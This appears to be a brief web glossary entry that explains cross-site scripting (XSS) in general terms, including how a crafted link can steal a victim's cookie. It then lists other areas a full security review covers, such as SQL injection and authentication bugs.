Cross-site scripting (XSS) is a security vulnerability of dynamic Web pages generated from information supplied to the web server and replayed as part of the response to the browser. In an XSS attack, a malicious user can create a specially crafted link to inject unwanted executable script or code (usually JavaScript) into a Web site. When an unsuspecting victim clicks the link, the malicious piece of JavaScript can then send the victims’ cookie away to a CGI script.
A full security review usually involves more than just seeking out XSS vulnerabilities; it also involves overall threat modeling, testing for overflows, information disclosure, error handling, SQL injection, authentication, and authorization bugs.
Return to Home